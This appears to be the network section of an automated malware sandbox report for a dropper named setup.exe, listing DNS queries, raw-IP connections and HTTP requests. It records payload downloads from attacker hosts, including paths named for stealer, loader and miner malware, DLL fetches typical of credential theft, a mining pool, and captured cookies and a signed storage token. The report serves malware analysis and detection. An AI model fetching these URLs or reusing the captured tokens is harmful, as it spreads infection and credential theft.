Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.rapidfilestorage.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: helsinki-dtc.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: skrptfiles.tracemonitors.com

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49761 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.99.177
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.78.242.100
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.78.242.100
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.78.242.100
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 80.78.242.100
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.80
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.133.27

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

Code function: 7_2_0067DAB0 recv,WSAGetLastError,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,send,recv,recv,recv,recv,Sleep,Sleep,

7_2_0067DAB0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /ssl/crt.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: lop.foxesjoy.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sdgdf/fbghhj/downloads/streamer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /385137/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/67e8095f-ddaa-4765-8f3a-5f79b5cf66c0/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHVJXWTXU&Signature=6x0j3jCqJIu9ecs3s6GtlhgLnsU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQD%2F2aNgvwR%2BzDTfk81ofa8RoMfgWY6HIHaPq6AVG5xEYAIhAJqDf3iSPie3cXsxWWnwnW8qwgK1Tac0vhv18BHJA7wsKqcCCGcQABoMOTg0NTI1MTAxMTQ2Igy8ya024r6DMXH4P4YqhAKQSomtAk%2FsqiXI2%2F3voOa7hrDvFCv9VrBtu1RIEm99MXJW7beO%2B2HqROhFQwyiH1W0FURY0nM66e6QQ1eshMPl6wuVF8aiDYVv80BaYrRUqqJbDBjHH6k2n7jlWpH4Tw1PMrRevf3ArvGyd9YcCfmAztez9uMctNQcfdK%2B8C3P%2FvVm04c%2BdJIDwxu6FMQq0TfQQoxa0hMkgxUcRdDJDFaLcnb6%2FG1Ej0KO3weudMoHZi%2FdazhGjoi%2BHAWbwlw8Vukp%2By8rtl0d%2B9YEZcfdwG6I0BtVaPDwyCTzPkXRYOFTrSdaG3zEncRQV%2FIvZhapXMg7J0ybYPS4gtKqOeLxnOmxMoOBwDDezIy0BjqcAU3U3hMrRgYyxiW6p641c%2FfbR5vglkKAfISIMwmD%2BNVhIbYo1lGxIuF0WNeBoNFVKIQ2SulUFhK2Nlg%2Ftsqf4kdPsqUD5oMW%2FuS6%2BrpQIaXGoZFElhRLRAMZFHDYRHsXbuRsAhBsBkYAT%2BIEkb3xhUStn5Xxdeh5Qm7xW4eE%2B2zdY%2B0yA6TA5cBngIMSLG3vA9TKHy64VDpvVyKfOg%3D%3D&Expires=1719872870 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=ex.7TgCY468wc5yu3YRkEsGRG9qmHn86dcAYyaJ385w-1719871508-1.0.1.1-5hdHtN2CIlAZ3ndgxjU1QFbaLT0pT5n.uDcbnhaYWTdTD8z4UsNVmuHyiV0JqEgrvJtmikuVD.LZq.kf7BpweA; _cfuvid=tIsBmNXiVts2Ahh4K2Kvba0M8lkel4q.Jz3q1r9HKzs-1719871508397-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /385137/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: a.884736279.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc851967711_678869252?hash=7enX4Yf9Eh9a580ka8ZSEsnG3OhzAssallq1mEISP3P&dl=j8nlfPwylDCi59wUX6tJ9uBa1hYeg1sJKQmMIBqlpjL&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS0PX4HrE4vRkDm0d4mbocnTvyEbLzKxGUP&api=1&no_preview=1#def_meta HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfeEiGdn2IU9JTEdwqaRFTDnZMFQJn7v9z&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237031/u851967711/docs/d44/57796f4397b6/BotClient.bmp?extra=Uo921g-adSvvTWhdB6yDb5HdFI5_X3VJlRVmHM-Bh6mJlvI7hkGi94eW7KfU-ssLh3GfPV8Ees6kZM0RD1upQfkxRtTtcM3LgknqFomcBUvMb567aPkC4b-b3Csz0akrGpBI454GBQIw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-23.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lhSc6Qh08VS3lx8KlKwYrkSiYGlwvhnSbB1cMD&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c235031/u851967711/docs/d58/101acf609709/crypted.bmp?extra=Ux3hmN1iPre6dOlOSIWGtqFvEkIdvKeIAUWi6lAsDtS-lf2EKyAeU1NTXtXwHQmiuKqNE3-DjYe0f5mcu6SGTNHoKn8lJaXQr06BHIPY-Yp_iz6-eS16TocDohevBfPa-7a9dirBWiks HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLPwa3VHUZ6RGMrmgXoJxs6sK0ufCNL8HdLsSa4&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cacheCookie: remixlang=3; remixstlid=9092944805461463727_DtkQ3CUIobNM2Gxry3e19bgTzz0nGnqrsykLnhHF59z; remixlgck=374e8ec07457a99dc7; remixstid=242356419_2xqWAu8IaSk4k7yzGaEqYJBhxAcSZqxhFf8GwzSXfco; remixir=1
Source: global traffic	HTTP traffic detected: GET /c235031/u851967711/docs/d19/e642d2d3ea8a/File.bmp?extra=codZE4oOkF_mb0aHMW2_KJkLotDgGHzpcd-JeGF88YLnbk2Qm4WcZoXVvzJ1HuH2HaOhqgSp6_uV0Z6TCfxUYwreX5Rq2H_XmfQYz82S4_LBrsYcRulTXC2HKGtLY-ovV1tbmUk3ivmp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /g067n HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.99.177
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.105.133.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.105.133.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /riana/super.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 77.91.77.80Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/525403 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 80.78.242.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /lumma2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?BAxskCrAzBkAQLhyBAyQiyrSwfaJVtVcO HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?BaGHTJrEOqpSoOUUbPmVVgUlkCFxoVbnT HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?PFusrYpNtPDdGjvKoKGcbouLSvYzMzgzu HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?lkNOHJiXnxKRAffVlKrZwoIEmkviEhCxR HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?ZOmFPgPUTVZNbWpVqvSvPLQtsthTrEhbx HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?FJSFGEosnJwNZSTgJVMlBADdAGOvxPznz HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?lfKppfDaSKtbiZoZrqLvfigDaXuNMaIUn HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?BsbCNQNrlQruMiRbNuFhJgcZknRTSMCKj HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?nWWigaXNQYYJICpsdMZSxscisfoqitXJL HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.rapidfilestorage.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: helsinki-dtc.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: skrptfiles.tracemonitors.com
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?lVCwnpMUrdtQuoonAEIPdNPTEKYCDRfxr HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?uKnuZolhihzrwcGciuiXPYJRFqygVFjtF HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?UpPMoHiZGixvnmLTDXgCACmDdHoeBzWlB HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.rapidfilestorage.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: helsinki-dtc.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: skrptfiles.tracemonitors.com
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache

Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.facebook.com (Facebook)
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.twitter.com (Twitter)
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: api.myip.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: vk.com
Source: global traffic	DNS traffic detected: DNS query: monoblocked.com
Source: global traffic	DNS traffic detected: DNS query: lop.foxesjoy.com
Source: global traffic	DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: a.884736279.xyz
Source: global traffic	DNS traffic detected: DNS query: sun6-23.userapi.com
Source: global traffic	DNS traffic detected: DNS query: sun6-22.userapi.com
Source: global traffic	DNS traffic detected: DNS query: sun6-21.userapi.com
Source: global traffic	DNS traffic detected: DNS query: iplogger.org
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: ellaboratepwsz.xyz
Source: global traffic	DNS traffic detected: DNS query: potterryisiw.shop
Source: global traffic	DNS traffic detected: DNS query: tea.arpdabl.org
